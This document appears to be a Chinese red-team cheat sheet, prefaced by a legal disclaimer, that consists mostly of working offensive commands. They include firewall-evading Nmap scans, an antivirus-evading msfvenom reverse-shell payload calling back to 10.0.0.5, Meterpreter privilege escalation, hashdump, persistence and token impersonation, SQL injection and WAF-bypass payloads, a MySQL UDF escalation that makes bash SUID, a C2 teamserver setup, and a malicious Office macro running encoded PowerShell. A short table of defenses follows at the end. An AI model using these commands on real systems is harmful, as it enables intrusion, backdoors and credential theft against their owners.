法律声明:本文所有工具及技术仅限用于合法授权的安全测试,使用者需遵守《网络安全法》及相关法律法规,擅自攻击他人系统将承担刑事责任。
Nmap(Network Mapper)采用TCP/IP协议栈指纹识别技术,通过发送定制化数据包分析响应差异,精准识别主机存活状态、开放端口及服务版本。其脚本引擎(NSE)支持400+漏洞检测脚本,是红队信息收集阶段的核心装备。
# 全端口扫描(TCP SYN扫描)
nmap -p 1-65535 -T4 192.168.1.1
# 绕过防火墙(分片扫描+欺骗MAC)
nmap -sS -f --spoof-mac 0 192.168.1.1
# 漏洞扫描(调用CVE检测脚本)
nmap --script vuln -p 80,443 192.168.1.1
# 生成可视化报告
nmap -sV -oX scan.xml 10.0.0.0/24
xsltproc scan.xml -o report.html
# 输出示例(发现SMB漏洞主机)
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1
|_smb-vuln-ms17-010: VULNERABLE
Metasploit采用模块化设计,包含:
# 生成恶意载荷(免杀处理)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -f exe > payload.exe
# 启动监听模块
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > exploit -j
# 提权操作(获取SYSTEM权限)
meterpreter > getsystem
meterpreter > hashdump
# 持久化后门(计划任务)
meterpreter > run persistence -U -i 60 -p 443 -r 10.0.0.5
# 内网横向移动(PTH攻击)
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
# 手动构造布尔盲注Payload
GET /product.php?id=1' AND SUBSTRING((SELECT @@version),1,1)='M'-- HTTP/1.1
# 使用Intruder进行自动化枚举
Position: id=§1§
Payload: 1' AND (SELECT MID(COLUMN_NAME,§1§,1) FROM information_schema.COLUMNS WHERE TABLE_NAME='users')='a'--
# 使用hashcat爆破密钥
hashcat -m 16500 -a 0 jwt.txt rockyou.txt
# 篡改JWT载荷
{
"alg": "HS256",
"typ": "JWT"
}
{
"user": "admin",
"exp": 4102444800
}
# 二阶注入检测
sqlmap -u "http://example.com/search" --data "query=test" --second-url "http://example.com/results"
# 绕过WAF(分块编码+空格替换)
sqlmap -u "http://example.com?id=1" --tamper=chunked,space2comment
# 直接连接数据库
sqlmap -d "mysql://user:[email protected]:3306/dbname" --sql-query "SELECT * FROM users"
-- 利用MySQL UDF提权
C:\> sqlmap -u "http://example.com?id=1" --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/
mysql> CREATE FUNCTION sys_exec RETURNS string SONAME 'lib_mysqludf_sys.so';
mysql> SELECT sys_exec('chmod 4755 /bin/bash');
# 生成HTTPS Beacon
./teamserver 10.0.0.5 password123 /path/to/c2.profile
# C2配置文件示例(domain前端)
http-config {
set headers "Date, Server, Content-Length";
set trust_x_forwarded_for "true";
}
Sub AutoOpen()
Shell "powershell -exec bypass -EncodedCommand JABz..."
End Sub
X-Originating-IP: [10.0.0.5]
From: "HR Department" <[email protected]>
# 提取所有FTP密码
ftp.request.command == "PASS"
# 检测ARP投毒攻击
arp.duplicate-address-detected
# 解密WPA2流量(需握手包)
wlan.ta == 00:11:22:33:44:55 && eapol
// 解析自定义协议(Lua插件)
local my_proto = Proto("MyProto", "Custom Protocol")
local f_length = ProtoField.uint32("myproto.length", "Length")
my_proto.fields = { f_length }
function my_proto.dissector(buffer, pinfo, tree)
local len = buffer(0,4):uint()
tree:add(f_length, buffer(0,4))
end
register_postdissector(my_proto)
攻击类型 | 防御方案 | 检测工具 |
---|---|---|
端口扫描 | 部署IDS(Suricata/Snort) | Security Onion |
漏洞利用 | 定期Patch管理系统 | OpenVAS/Nexpose |
密码爆破 | 双因素认证+账户锁定策略 | Fail2ban |
Web攻击 | WAF(ModSecurity/Cloudflare) | OWASP ZAP |
内网渗透 | 网络分段+零信任架构 | Microsoft ATP |
深度安全建议: